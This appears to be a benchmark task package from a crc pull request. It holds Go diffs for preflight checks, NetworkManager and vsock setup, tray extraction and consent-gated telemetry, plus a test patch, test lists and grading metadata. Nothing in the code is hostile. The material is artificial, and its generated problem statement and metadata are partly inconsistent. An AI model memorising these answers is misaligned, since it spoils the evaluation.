libvirt-daemon-kvm qemu-kvm" - switch distroID(distro) { - case linux.Ubuntu: + switch { + case distroIsLike(distro, linux.Ubuntu): return "apt-get update && apt-get install -y libvirt-daemon libvirt-daemon-system libvirt-clients" - case linux.RHEL, linux.CentOS, linux.Fedora: + case distroIsLike(distro, linux.Fedora): return yumCommand default: logging.Warnf("unsupported distribution %s, trying to install libvirt with yum", distro) diff --git a/pkg/crc/preflight/preflight_checks_network_linux.go b/pkg/crc/preflight/preflight_checks_network_linux.go index bc78d6802..ca22b3ea9 100644 --- a/pkg/crc/preflight/preflight_checks_network_linux.go +++ b/pkg/crc/preflight/preflight_checks_network_linux.go @@ -72,22 +72,27 @@ server=/crc.testing/192.168.130.11 dns=dnsmasq ` - crcNetworkManagerDispatcherPath = filepath.Join(crcNetworkManagerRootPath, "dispatcher.d", "pre-up.d", "99-crc.sh") - crcNetworkManagerDispatcherConfig = `#!/bin/sh + crcNetworkManagerOldDispatcherPath = filepath.Join(crcNetworkManagerRootPath, "dispatcher.d", "pre-up.d", "99-crc.sh") + crcNetworkManagerDispatcherPath = filepath.Join(crcNetworkManagerRootPath, "dispatcher.d", "99-crc.sh") + crcNetworkManagerDispatcherConfig = `#!/bin/sh # This is a NetworkManager dispatcher script to configure split DNS for # the 'crc' libvirt network. -# The corresponding crc bridge is recreated each time the system reboots, so -# it cannot be configured permanently through NetworkManager. -# Changing DNS settings with nmcli requires the connection to go down/up, -# so we directly make the change using resolvectl +# +# The corresponding crc bridge is not created through NetworkManager, so +# it cannot be configured permanently through NetworkManager. We make the +# change directly using resolvectl instead. +# +# NetworkManager will overwrite this resolvectl configuration every time a +# network connection goes up/down, so we run this script on each of these events +# to restore our settings. This is a NetworkManager bug which is fixed in +# version 1.26.6 by this commit: +# https://cgit.freedesktop.org/NetworkManager/NetworkManager/commit/?id=ee4e679bc7479de42780ebd8e3a4d74afa2b2ebe export LC_ALL=C -if [ "$1" = crc ]; then - resolvectl domain "$1" ~testing - resolvectl dns "$1" 192.168.130.11 - resolvectl default-route "$1" false -fi +resolvectl domain crc ~testing +resolvectl dns crc 192.168.130.11 +resolvectl default-route crc false exit 0 ` @@ -266,6 +271,10 @@ func checkCrcNetworkManagerDispatcherFile() error { func fixCrcNetworkManagerDispatcherFile() error { logging.Debug("Fixing NetworkManager dispatcher configuration") + + // Remove dispatcher script which was used in crc 1.20 - it's been moved to a new location + _ = removeNetworkManagerConfigFile(crcNetworkManagerOldDispatcherPath) + err := fixNetworkManagerConfigFile(crcNetworkManagerDispatcherPath, crcNetworkManagerDispatcherConfig, 0755) if err != nil { return err @@ -276,6 +285,9 @@ func fixCrcNetworkManagerDispatcherFile() error { } func removeCrcNetworkManagerDispatcherFile() error { + // Remove dispatcher script which was used in crc 1.20 - it's been moved to a new location + _ = removeNetworkManagerConfigFile(crcNetworkManagerOldDispatcherPath) + return removeNetworkManagerConfigFile(crcNetworkManagerDispatcherPath) } diff --git a/pkg/crc/preflight/preflight_checks_tray_darwin.go b/pkg/crc/preflight/preflight_checks_tray_darwin.go index 05961eee0..ee31ee2fd 100644 --- a/pkg/crc/preflight/preflight_checks_tray_darwin.go +++ b/pkg/crc/preflight/preflight_checks_tray_darwin.go @@ -195,7 +195,9 @@ func downloadOrExtractTrayApp() error { }() logging.Debug("Trying to extract tray from crc executable") - err = embed.Extract(filepath.Base(constants.GetCRCMacTrayDownloadURL()), tmpArchivePath) + trayFileName := filepath.Base(constants.GetCRCMacTrayDownloadURL()) + trayDestFileName := filepath.Join(tmpArchivePath, trayFileName) + err = embed.Extract(trayFileName, trayDestFileName) if err != nil { logging.Debug("Could not extract tray from crc executable", err) logging.Debug("Downloading crc tray") @@ -204,15 +206,14 @@ func downloadOrExtractTrayApp() error { return err } } - archivePath := filepath.Join(tmpArchivePath, filepath.Base(constants.GetCRCMacTrayDownloadURL())) outputPath := constants.CrcBinDir err = goos.MkdirAll(outputPath, 0750) if err != nil { return errors.Wrap(err, "Cannot create the target directory.") } - _, err = extract.Uncompress(archivePath, outputPath, false) + _, err = extract.Uncompress(trayDestFileName, outputPath, false) if err != nil { - return errors.Wrapf(err, "Cannot uncompress '%s'", archivePath) + return errors.Wrapf(err, "Cannot uncompress '%s'", trayDestFileName) } return nil } diff --git a/pkg/crc/preflight/preflight_checks_tray_windows.go b/pkg/crc/preflight/preflight_checks_tray_windows.go index 501984608..d2493018d 100644 --- a/pkg/crc/preflight/preflight_checks_tray_windows.go +++ b/pkg/crc/preflight/preflight_checks_tray_windows.go @@ -161,7 +161,9 @@ func fixTrayExecutableExists() error { }() logging.Debug("Trying to extract tray from crc executable") - err = embed.Extract(filepath.Base(constants.GetCRCWindowsTrayDownloadURL()), tmpArchivePath) + trayFileName := filepath.Base(constants.GetCRCWindowsTrayDownloadURL()) + trayDestFileName := filepath.Join(tmpArchivePath, trayFileName) + err = embed.Extract(trayFileName, trayDestFileName) if err != nil { logging.Debug("Could not extract tray from crc executable", err) logging.Debug("Downloading crc tray") @@ -170,10 +172,9 @@ func fixTrayExecutableExists() error { return err } } - archivePath := filepath.Join(tmpArchivePath, filepath.Base(constants.GetCRCWindowsTrayDownloadURL())) - _, err = extract.Uncompress(archivePath, constants.TrayExecutableDir, false) + _, err = extract.Uncompress(trayDestFileName, constants.TrayExecutableDir, false) if err != nil { - return fmt.Errorf("Cannot uncompress '%s': %v", archivePath, err) + return fmt.Errorf("Cannot uncompress '%s': %v", trayDestFileName, err) } return nil diff --git a/pkg/crc/preflight/preflight_linux.go b/pkg/crc/preflight/preflight_linux.go index c62be4746..e2587c8c1 100644 --- a/pkg/crc/preflight/preflight_linux.go +++ b/pkg/crc/preflight/preflight_linux.go @@ -8,6 +8,7 @@ import ( "strings" "syscall" + crcErrors "github.com/code-ready/crc/pkg/crc/errors" "github.com/code-ready/crc/pkg/crc/logging" "github.com/code-ready/crc/pkg/crc/network" crcos "github.com/code-ready/crc/pkg/os" @@ -71,7 +72,7 @@ func libvirtPreflightChecks(distro *linux.OsRelease) []Check { flags: CleanUpOnly, }, } - if distroID(distro) == linux.Ubuntu { + if distroIsLike(distro, linux.Ubuntu) { checks = append(checks, ubuntuPreflightChecks...) } return checks @@ -97,13 +98,20 @@ var libvirtNetworkPreflightChecks = [...]Check{ } var vsockPreflightChecks = Check{ - configKeySuffix: "check-vsock", - checkDescription: "Checking if vsock is correctly configured", - check: checkVsock, - fixDescription: "Checking if vsock is correctly configured", - fix: fixVsock, + configKeySuffix: "check-vsock", + checkDescription: "Checking if vsock is correctly configured", + check: checkVsock, + fixDescription: "Checking if vsock is correctly configured", + fix: fixVsock, + cleanupDescription: "Removing vsock configuration", + cleanup: removeVsockCrcSettings, } +const ( + vsockUdevRulesPath = "/usr/lib/udev/rules.d/99-crc-vsock.rules" + vsockModuleAutoLoadConfPath = "/etc/modules-load.d/vhost_vsock.conf" +) + func checkVsock() error { executable, err := os.Executable() if err != nil { @@ -126,7 +134,7 @@ func checkVsock() error { return err } if group.Name != "libvirt" { - return errors.New("/dev/vsock is not is the right group") + return errors.New("/dev/vsock is not in the right group") } } else { return errors.New("cannot cast info") @@ -146,21 +154,39 @@ func fixVsock() error { if err != nil { return err } - _, _, err = crcos.RunWithPrivilege("modprobe vhost_vsock", "modprobe", "vhost_vsock") + + udevRule := `KERNEL=="vsock", MODE="0660", OWNER="root", GROUP="libvirt"` + err = crcos.WriteToFileAsRoot("Create udev rule for /dev/vsock", udevRule, vsockUdevRulesPath, 0644) if err != nil { return err } - _, _, err = crcos.RunWithPrivilege("chown /dev/vsock", "chown", "root:libvirt", "/dev/vsock") + err = crcos.WriteToFileAsRoot(fmt.Sprintf("Create file %s", vsockModuleAutoLoadConfPath), "vhost_vsock", vsockModuleAutoLoadConfPath, 0644) if err != nil { return err } - _, _, err = crcos.RunWithPrivilege("chmod /dev/vsock", "chmod", "g+rw", "/dev/vsock") + _, _, err = crcos.RunWithPrivilege("modprobe vhost_vsock", "modprobe", "vhost_vsock") if err != nil { return err } return nil } +func removeVsockCrcSettings() error { + var mErr crcErrors.MultiError + _, _, err := crcos.RunWithPrivilege(fmt.Sprintf("rm %s", vsockUdevRulesPath), "rm", "-f", vsockUdevRulesPath) + if err != nil { + mErr.Collect(err) + } + _, _, err = crcos.RunWithPrivilege(fmt.Sprintf("rm %s", vsockModuleAutoLoadConfPath), "rm", "-f", vsockModuleAutoLoadConfPath) + if err != nil { + mErr.Collect(err) + } + if len(mErr.Errors) == 0 { + return nil + } + return mErr +} + func getAllPreflightChecks() []Check { checks := getPreflightChecksForDistro(distro(), network.DefaultMode) checks = append(checks, vsockPreflightChecks) @@ -180,7 +206,7 @@ func getNetworkChecksForDistro(distro *linux.OsRelease, networkMode network.Mode switch { default: - logging.Warnf("distribution-specific preflight checks are not implemented for '%s'", distroID(distro)) + logging.Warnf("distribution-specific preflight checks are not implemented for '%s'", distro.ID) fallthrough case distroIsLike(distro, linux.Ubuntu), distroIsLike(distro, linux.Fedora): checks = append(checks, nmPreflightChecks[:]...) @@ -207,25 +233,17 @@ func getPreflightChecksForDistro(distro *linux.OsRelease, networkMode network.Mo return checks } -func usesSystemdResolved(osRelease *linux.OsRelease) bool { - switch distroID(osRelease) { - case linux.Ubuntu: +func usesSystemdResolved(distro *linux.OsRelease) bool { + switch { + case distroIsLike(distro, linux.Ubuntu): return true - case linux.Fedora: - return osRelease.VersionID >= "33" + case distro.ID == linux.Fedora: + return distro.VersionID >= "33" default: return false } } -func distroID(osRelease *linux.OsRelease) linux.OsType { - if osRelease == nil { - return "unknown" - } - // FIXME: should also use IDLike - return osRelease.ID -} - func distroIsLike(osRelease *linux.OsRelease, osType linux.OsType) bool { if osRelease == nil { return false @@ -246,8 +264,10 @@ func distroIsLike(osRelease *linux.OsRelease, osType linux.OsType) bool { func distro() *linux.OsRelease { distro, err := linux.GetOsRelease() if err != nil { - logging.Warnf("cannot get distribution name: %v", err) - return nil + logging.Errorf("cannot get distribution name: %v", err) + return &linux.OsRelease{ + ID: "unknown", + } } return distro } diff --git a/pkg/crc/segment/segment.go b/pkg/crc/segment/segment.go index 254dfb386..e9ac423c4 100644 --- a/pkg/crc/segment/segment.go +++ b/pkg/crc/segment/segment.go @@ -4,7 +4,9 @@ import ( "io/ioutil" "os" "path/filepath" + "runtime" "strings" + "time" "github.com/code-ready/crc/cmd/crc/cmd/config" crcConfig "github.com/code-ready/crc/pkg/crc/config" @@ -53,24 +55,35 @@ func (c *Client) Close() error { return c.segmentClient.Close() } -func (c *Client) Upload(action string, err error) error { +func (c *Client) Upload(action string, duration time.Duration, err error) error { if !c.config.Get(config.ConsentTelemetry).AsBool() { return nil } - logging.Debug("Uploading the error to segment") anonymousID, uerr := getUserIdentity(c.telemetryFilePath) if uerr != nil { return uerr } - t := analytics.NewTraits(). - Set("action", action). - Set("error", err.Error()) + if err := c.segmentClient.Enqueue(analytics.Identify{ + AnonymousId: anonymousID, + Traits: analytics.NewTraits(). + Set("os", runtime.GOOS), + }); err != nil { + return err + } + + properties := analytics.NewProperties(). + Set("success", err == nil). + Set("duration", duration.Milliseconds()) + if err != nil { + properties = properties.Set("error", err.Error()) + } - return c.segmentClient.Enqueue(analytics.Identify{ + return c.segmentClient.Enqueue(analytics.Track{ AnonymousId: anonymousID, - Traits: t, + Event: action, + Properties: properties, }) } diff --git a/pkg/os/linux/release_info.go b/pkg/os/linux/release_info.go index bd951be21..836a6e8ce 100644 --- a/pkg/os/linux/release_info.go +++ b/pkg/os/linux/release_info.go @@ -92,9 +92,7 @@ func UnmarshalOsRelease(osReleaseContents []byte, release *OsRelease) error { logging.Warnf("Warning: got an invalid line error parsing /etc/os-release: %s", err) continue } - if err := release.setIfPossible(key, val); err != nil { - logging.Debug(err) - } + _ = release.setIfPossible(key, val) } return nil } @@ -102,7 +100,7 @@ func UnmarshalOsRelease(osReleaseContents []byte, release *OsRelease) error { func GetOsRelease() (*OsRelease, error) { // Check if release file exist if _, err := os.Stat(releaseFile); os.IsNotExist(err) { - return nil, fmt.Errorf("%s not exist", releaseFile) + return nil, fmt.Errorf("%s doesn't exist", releaseFile) } content, err := ioutil.ReadFile(releaseFile) if err != nil {
Remove kubelet status check from start It made sense before to check the status before perfoming some of the cluster specific tasks since we were stopping/starting kubelet service many time but now we just start the service and then do all the cluster specific operations. If there is any issue with kubelet service it is failed in early stage.
**Title** Simplify start flow, remove obsolete kubelet check and streamline pre‑flight, telemetry and platform handling **Problem** - The start command performed an unnecessary kubelet‑service status check, causing premature failures. - Pre‑flight configuration exposed both `skip-` and `warn-` flags, complicating user intent and documentation. - Telemetry uploads did not include execution duration and could block on errors. - Several platform‑specific scripts and detection logic were outdated, leading to incorrect behavior on Ubuntu, Fedora and NetworkManager environments. **Root Cause** Legacy checks and configuration options were retained after the start process was refactored, and telemetry/OS‑specific handling was not updated to match current workflows. **Fix / Expected Behavior** - Eliminate the kubelet service status verification from the VM start sequence; failures will now surface later if the service is not running. - Remove all `warn-` pre‑flight flags; only `skip-` flags remain and are sorted consistently. - Upload telemetry events with the command’s execution time and a success flag, handling upload errors gracefully. - Relocate the NetworkManager dispatcher script to its correct path, remove the old script, and ensure it is invoked on each connection change. - Detect Ubuntu‑like distributions using `ID_LIKE` and apply the proper libvirt install command; treat Fedora‑like releases correctly. - Add proper setup and cleanup for vsock configuration, including udev rules and module autoload files. - Fix tray extraction on macOS and Windows by using explicit file paths for the downloaded archive. - Update documentation to reflect the simplified `skip-check` usage. **Risk & Validation** - Verify that `crc start` completes successfully on all supported Linux distros without the removed kubelet check. - Run the full pre‑flight suite to confirm that only `skip-` options are recognized and that warning behavior is eliminated. - Execute start and setup commands while telemetry consent is enabled; ensure events are sent with duration and no panics occur on upload failure. - Test NetworkManager‑based hosts to confirm the dispatcher script is present at the new location and restores split‑DNS settings after network changes.
1,815
code-ready/crc
diff --git a/pkg/crc/preflight/preflight_darwin_test.go b/pkg/crc/preflight/preflight_darwin_test.go index 9b0b840c6..5f94d8c75 100644 --- a/pkg/crc/preflight/preflight_darwin_test.go +++ b/pkg/crc/preflight/preflight_darwin_test.go @@ -12,7 +12,7 @@ import ( func TestCountConfigurationOptions(t *testing.T) { cfg := config.New(config.NewEmptyInMemoryStorage()) RegisterSettings(cfg) - assert.Len(t, cfg.AllConfigs(), 18) + assert.Len(t, cfg.AllConfigs(), 9) } func TestCountPreflights(t *testing.T) { diff --git a/pkg/crc/preflight/preflight_linux_test.go b/pkg/crc/preflight/preflight_linux_test.go index c0cd327ac..3b9e22649 100644 --- a/pkg/crc/preflight/preflight_linux_test.go +++ b/pkg/crc/preflight/preflight_linux_test.go @@ -21,7 +21,7 @@ func TestCountConfigurationOptions(t *testing.T) { var preflightChecksCount int for _, check := range getAllPreflightChecks() { if check.configKeySuffix != "" { - preflightChecksCount += 2 + preflightChecksCount++ } } assert.True(t, options == preflightChecksCount, "Unexpected number of preflight configuration flags, got %d, expected %d", options, preflightChecksCount) diff --git a/pkg/crc/preflight/preflight_test.go b/pkg/crc/preflight/preflight_test.go index 47726a8b0..c624566ca 100644 --- a/pkg/crc/preflight/preflight_test.go +++ b/pkg/crc/preflight/preflight_test.go @@ -39,18 +39,6 @@ func TestFixPreflight(t *testing.T) { assert.True(t, calls.fixed) } -func TestWarnPreflight(t *testing.T) { - check, calls := sampleCheck(errors.New("check failed"), errors.New("fix failed")) - cfg := config.New(config.NewEmptyInMemoryStorage()) - doRegisterSettings(cfg, []Check{*check}) - _, err := cfg.Set("warn-sample", true) - assert.NoError(t, err) - - assert.NoError(t, doFixPreflightChecks(cfg, []Check{*check})) - assert.True(t, calls.checked) - assert.True(t, calls.fixed) -} - func sampleCheck(checkErr, fixErr error) (*Check, *status) { status := &status{} return &Check{ diff --git a/pkg/crc/preflight/preflight_windows_test.go b/pkg/crc/preflight/preflight_windows_test.go index b9e84e819..ac08d4bda 100644 --- a/pkg/crc/preflight/preflight_windows_test.go +++ b/pkg/crc/preflight/preflight_windows_test.go @@ -11,7 +11,7 @@ import ( func TestCountConfigurationOptions(t *testing.T) { cfg := config.New(config.NewEmptyInMemoryStorage()) RegisterSettings(cfg) - assert.Len(t, cfg.AllConfigs(), 24) + assert.Len(t, cfg.AllConfigs(), 12) } func TestCountPreflights(t *testing.T) { diff --git a/pkg/crc/segment/segment_test.go b/pkg/crc/segment/segment_test.go index cdf4faa22..abc799f97 100644 --- a/pkg/crc/segment/segment_test.go +++ b/pkg/crc/segment/segment_test.go @@ -8,7 +8,9 @@ import ( "net/http/httptest" "os" "path/filepath" + "runtime" "testing" + "time" cmdConfig "github.com/code-ready/crc/cmd/crc/cmd/config" crcConfig "github.com/code-ready/crc/pkg/crc/config" @@ -22,8 +24,11 @@ type segmentResponse struct { AnonymousID string `json:"anonymousId"` MessageID string `json:"messageId"` Traits struct { - Error string `json:"error"` + OS string `json:"os"` } `json:"traits"` + Properties struct { + Error string `json:"error"` + } `json:"properties"` Type string `json:"type"` } `json:"batch"` Context struct { @@ -81,14 +86,17 @@ func TestClientUploadWithConsent(t *testing.T) { c, err := newCustomClient(config, filepath.Join(dir, "telemetry"), server.URL) require.NoError(t, err) - require.NoError(t, c.Upload("start", errors.New("an error occurred"))) + require.NoError(t, c.Upload("start", time.Minute, errors.New("an error occurred"))) require.NoError(t, c.Close()) select { case x := <-body: s := segmentResponse{} require.NoError(t, json.Unmarshal(x, &s)) - require.Equal(t, s.Batch[0].Traits.Error, "an error occurred") + require.Equal(t, s.Batch[0].Type, "identify") + require.Equal(t, s.Batch[0].Traits.OS, runtime.GOOS) + require.Equal(t, s.Batch[1].Type, "track") + require.Equal(t, s.Batch[1].Properties.Error, "an error occurred") require.Equal(t, s.Context.App.Name, "crc") require.Equal(t, s.Context.App.Version, version.GetCRCVersion()) default: @@ -111,7 +119,7 @@ func TestClientUploadWithOutConsent(t *testing.T) { c, err := newCustomClient(config, filepath.Join(dir, "telemetry"), server.URL) require.NoError(t, err) - require.NoError(t, c.Upload("start", errors.New("an error occurred"))) + require.NoError(t, c.Upload("start", time.Second, errors.New("an error occurred"))) require.NoError(t, c.Close()) select { diff --git a/test/integration/features/config.feature b/test/integration/features/config.feature index dd323b76c..8ce0c47b3 100644 --- a/test/integration/features/config.feature +++ b/test/integration/features/config.feature @@ -56,55 +56,6 @@ Feature: Test configuration settings When unsetting config property "disable-update-check" succeeds Then "JSON" config file "crc.json" in CRC home folder does not contain key "disable-update-check" - # WARNINGS - - Scenario Outline: CRC config checks (warnings) - When setting config property "<property>" to value "<value1>" succeeds - Then "JSON" config file "crc.json" in CRC home folder contains key "<property>" with value matching "<value1>" - When setting config property "<property>" to value "<value2>" succeeds - Then "JSON" config file "crc.json" in CRC home folder contains key "<property>" with value matching "<value2>" - When unsetting config property "<property>" succeeds - Then "JSON" config file "crc.json" in CRC home folder does not contain key "<property>" - - @darwin - Examples: Config warnings on Mac - | property | value1 | value2 | - | warn-check-bundle-extracted | true | false | - | warn-check-hosts-file-permissions | true | false | - | warn-check-hyperkit-driver | true | false | - | warn-check-hyperkit-installed | true | false | - | warn-check-resolver-file-permissions | true | false | - | warn-check-root-user | true | false | - - @linux - Examples: Config warnings on Linux - | property | value1 | value2 | - | warn-check-bundle-extracted | true | false | - | warn-check-crc-dnsmasq-file | true | false | - | warn-check-crc-network | true | false | - | warn-check-crc-network-active | true | false | - | warn-check-kvm-enabled | true | false | - | warn-check-libvirt-driver | true | false | - | warn-check-libvirt-installed | true | false | - | warn-check-libvirt-running | true | false | - | warn-check-libvirt-version | true | false | - | warn-check-network-manager-config | true | false | - | warn-check-network-manager-installed | true | false | - | warn-check-network-manager-running | true | false | - | warn-check-root-user | true | false | - | warn-check-user-in-libvirt-group | true | false | - | warn-check-virt-enabled | true | false | - - @windows - Examples: Config warnings on Windows - | property | value1 | value2 | - | warn-check-administrator-user | true | false | - | warn-check-bundle-extracted | true | false | - | warn-check-hyperv-installed | true | false | - | warn-check-hyperv-switch | true | false | - | warn-check-user-in-hyperv-group | true | false | - | warn-check-windows-version | true | false | - # SKIP Scenario Outline: CRC config checks (skips)
[ "TestCountConfigurationOptions", "TestClientUploadWithConsent", "TestClientUploadWithOutConsent" ]
[ "TestApi", "TestSetconfigApi", "TestGetconfigApi", "TestGetClusterOperatorsStatus", "TestGetClusterOperatorsStatusProgressing", "TestGetClusterOperatorStatus", "TestGetClusterOperatorStatusNotFound", "TestSuccessfullyApplied", "TestViperConfigUnknown", "TestViperConfigSetAndGet", "TestViperConfigUnsetAndGet", "TestViperConfigSetReloadAndGet", "TestViperConfigLoadDefaultValue", "TestViperConfigBindFlagSet", "TestViperConfigCastSet", "TestCannotSetWithWrongType", "TestCannotGetWithWrongType", "TestRetryAfter", "TestRetryAfterFailure", "TestRetryAfterSlowFailure", "TestRetryAfterMaxAttempts", "TestRetryAfterSuccessAfterFailures", "TestMultiErrorString", "TestCertificateAuthority", "TestUnmarshalMarshal", "TestUse", "TestExtract", "TestVersionCheck", "TestValidateProxyURL", "TestRunCommand", "TestRunCommandWithoutContextAndCluster", "TestCountPreflights", "TestCheckPreflight", "TestSkipPreflight", "TestFixPreflight", "TestCheckAppArmor", "TestFixAppArmor", "TestCleanupAppArmor", "TestNewKeyPair", "TestRunner", "TestGenerateSSHKey", "TestSystemd", "TestSystemdStatuses", "TestUncompress", "TestUnCompressBundle", "TestReplaceEnv", "TestAddEnv", "TestFileContentFuncs", "TestParseOsRelease", "TestParseLine", "TestDetectBash", "TestDetectFish", "TestUnknownShell" ]
Method: Client.Upload(action string, duration time.Duration, err error) Location: pkg/crc/segment/segment.go Inputs: - **action** (string): name of the command or operation being reported (e.g., “start”). - **duration** (time.Duration): elapsed time of the operation; used for the “duration” property in the telemetry payload. - **err** (error): the error returned by the operation, or nil on success; its message is sent as the “error” property when non‑nil. Outputs: - **error**: nil if telemetry is disabled or the identify/track event was queued successfully; otherwise the enqueue error (or any underlying error from building the payload). Description: Uploads a telemetry event to Segment. It first sends an Identify call containing the OS information, then sends a Track call with the action name, a success flag, the measured duration, and optionally the error message. The call is a no‑op when the user has opted out of telemetry.
Apache-2.0
{ "base_image_name": "go_1.19.13", "install": [ "export DEBIAN_FRONTEND=noninteractive && apt-get update -qq && apt-get install -y -qq golang", "export GOPATH=$HOME/go && export GOCACHE=$HOME/.cache/go-build && export XDG_CACHE_HOME=$HOME/.cache && export HOME=/tmp && mkdir -p $GOCACHE $HOME", "go mod download" ], "log_parser": "parse_log_gotest", "test_cmd": "make test" }
{ "num_modified_files": 12, "num_modified_lines": 119, "pr_author": "praveenkumar", "pr_labels": [ "approved" ], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "hard", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue asks to remove a kubelet status check, but the provided test patch also changes configuration option counts, removes warning‑related preflight code, alters telemetry upload signatures, and updates several platform‑specific scripts. The tests now expect different values (e.g., config option counts) that were not mentioned in the issue, indicating missing acceptance criteria and extra required changes. This mismatch is a classic ambiguous specification (B4) rather than a cleanly solvable problem.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "config option count assertions expect old numbers (18, 24) but patch reduces them to half", "preflight warning test removed while tests still reference warning behavior", "segment.Upload signature changed (adds duration) causing test failures" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
10c1dda3168a5ce13d4ed1431189e8e2ec086141
2021-01-05 14:25:06
openshift-ci-robot: [APPROVALNOTIFIER] This PR is **APPROVED** This pull-request has been approved by: *<a href="https://github.com/code-ready/crc/pull/1816#" title="Author self-approved">praveenkumar</a>* The full list of commands accepted by this bot can be found [here](https://go.k8s.io/bot-commands?repo=code-ready%2Fcrc). The pull request process is described [here](https://git.k8s.io/community/contributors/guide/owners.md#the-code-review-process) <details > Needs approval from an approver in each of these files: - ~~[OWNERS](https://github.com/code-ready/crc/blob/master/OWNERS)~~ [praveenkumar] Approvers can indicate their approval by writing `/approve` in a comment Approvers can cancel approval by writing `/approve cancel` in a comment </details> <!-- META={"approvers":[]} --> openshift-ci-robot: [APPROVALNOTIFIER] This PR is **APPROVED** This pull-request has been approved by: *<a href="https://github.com/code-ready/crc/pull/1816#pullrequestreview-561831138" title="Approved">cfergeau</a>*, *<a href="https://github.com/code-ready/crc/pull/1816#" title="Author self-approved">praveenkumar</a>* The full list of commands accepted by this bot can be found [here](https://go.k8s.io/bot-commands?repo=code-ready%2Fcrc). The pull request process is described [here](https://git.k8s.io/community/contributors/guide/owners.md#the-code-review-process) <details > Needs approval from an approver in each of these files: - ~~[OWNERS](https://github.com/code-ready/crc/blob/master/OWNERS)~~ [cfergeau,praveenkumar] Approvers can indicate their approval by writing `/approve` in a comment Approvers can cancel approval by writing `/approve cancel` in a comment </details> <!-- META={"approvers":[]} --> openshift-ci-robot: New changes are detected. LGTM label has been removed.
code-ready__crc-1816
diff --git a/cmd/crc/cmd/config/config.go b/cmd/crc/cmd/config/config.go index 6a191653b..4aa2e4cdb 100644 --- a/cmd/crc/cmd/config/config.go +++ b/cmd/crc/cmd/config/config.go @@ -52,22 +52,15 @@ func RegisterSettings(cfg *config.Config) { } func isPreflightKey(key string) bool { - return strings.HasPrefix(key, "skip-") || strings.HasPrefix(key, "warn-") + return strings.HasPrefix(key, "skip-") } // less is used to sort the config keys. We want to sort first the regular keys, and -// then the keys related to preflight starting with a skip- or warn- prefix. We want -// these preflight keys to be grouped by pair: 'skip-bar', 'warn-bar', 'skip-foo', 'warn-foo' -// would be sorted in that order. +// then the keys related to preflight starting with a skip- prefix. func less(lhsKey, rhsKey string) bool { if isPreflightKey(lhsKey) { if isPreflightKey(rhsKey) { - // lhs is preflight, rhs is preflight - if lhsKey[4:] == rhsKey[4:] { - // we want skip-foo before warn-foo - return lhsKey < rhsKey - } - // ignore skip-/warn- prefix + // ignore skip prefix return lhsKey[4:] < rhsKey[4:] } // lhs is preflight, rhs is not preflight diff --git a/cmd/crc/cmd/root.go b/cmd/crc/cmd/root.go index deac2af5f..36e7a13b2 100644 --- a/cmd/crc/cmd/root.go +++ b/cmd/crc/cmd/root.go @@ -174,9 +174,10 @@ func addForceFlag(cmd *cobra.Command) { func executeWithLogging(fullCmd string, input func(cmd *cobra.Command, args []string) error) func(cmd *cobra.Command, args []string) error { return func(cmd *cobra.Command, args []string) error { + logging.Debugf("Running '%s'", fullCmd) if err := input(cmd, args); err != nil { if serr := segmentClient.Upload(fullCmd, err); serr != nil { - fmt.Println(serr.Error()) + logging.Debugf("Cannot send data to telemetry: %v", serr) } return err } diff --git a/docs/source/topics/con_about-codeready-containers-configuration.adoc b/docs/source/topics/con_about-codeready-containers-configuration.adoc index 160bc0043..8c858f24c 100644 --- a/docs/source/topics/con_about-codeready-containers-configuration.adoc +++ b/docs/source/topics/con_about-codeready-containers-configuration.adoc @@ -9,4 +9,4 @@ Run the [command]`{bin} config --help` command to list the available properties. You can also use the [command]`{bin} config` command to configure the behavior of the startup checks for the [command]`{bin} start` and [command]`{bin} setup` commands. By default, startup checks report an error and stop execution when their conditions are not met. -Set the value of a property starting with `skip-check` or `warn-check` to `true` to skip the check or report a warning rather than an error, respectively. +Set the value of a property starting with `skip-check` to `true` to skip the check. diff --git a/pkg/crc/preflight/preflight.go b/pkg/crc/preflight/preflight.go index 7652758ab..ada6d0e19 100644 --- a/pkg/crc/preflight/preflight.go +++ b/pkg/crc/preflight/preflight.go @@ -50,20 +50,6 @@ func (check *Check) shouldSkip(config config.Storage) bool { return config.Get(check.getSkipConfigName()).AsBool() } -func (check *Check) getWarnConfigName() string { - if check.configKeySuffix == "" { - return "" - } - return "warn-" + check.configKeySuffix -} - -func (check *Check) shouldWarn(config config.Storage) bool { - if check.configKeySuffix == "" { - return false - } - return config.Get(check.getWarnConfigName()).AsBool() -} - func (check *Check) doCheck(config config.Storage) error { if check.checkDescription == "" { panic(fmt.Sprintf("Should not happen, empty description for check '%s'", check.configKeySuffix)) @@ -110,13 +96,8 @@ func doPreflightChecks(config config.Storage, checks []Check) error { if check.flags&SetupOnly == SetupOnly || check.flags&CleanUpOnly == CleanUpOnly { continue } - err := check.doCheck(config) - if err != nil { - if check.shouldWarn(config) { - logging.Warn(err.Error()) - } else { - return err - } + if err := check.doCheck(config); err != nil { + return err } } return nil @@ -131,13 +112,8 @@ func doFixPreflightChecks(config config.Storage, checks []Check) error { if err == nil { continue } - err = check.doFix() - if err != nil { - if check.shouldWarn(config) { - logging.Warn(err.Error()) - } else { - return err - } + if err = check.doFix(); err != nil { + return err } } return nil @@ -169,7 +145,6 @@ func doRegisterSettings(cfg config.Schema, checks []Check) { for _, check := range checks { if check.configKeySuffix != "" { cfg.AddSetting(check.getSkipConfigName(), false, config.ValidateBool, config.SuccessfullyApplied) - cfg.AddSetting(check.getWarnConfigName(), false, 